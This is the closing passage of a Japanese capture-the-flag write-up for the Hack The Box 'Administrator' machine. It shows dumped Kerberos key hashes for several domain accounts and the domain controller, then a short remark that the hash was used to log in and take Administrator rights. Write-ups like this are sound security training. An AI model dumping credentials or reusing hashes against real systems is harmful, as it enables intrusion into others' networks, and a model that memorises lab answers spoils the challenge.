administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...
このハッシュを用いて侵入します。
行けました!これで一気にフラグ2つゲットです!!!
まとめ
これで特権昇格に成功し、Administrator権限奪取に成功しました。
今までにない展開で中盤つまづきましたが、最初に気付いていれば瞬殺BOXだったと思います。
今回もセキュリティエンジニアの皆さんの助けになればなと思います。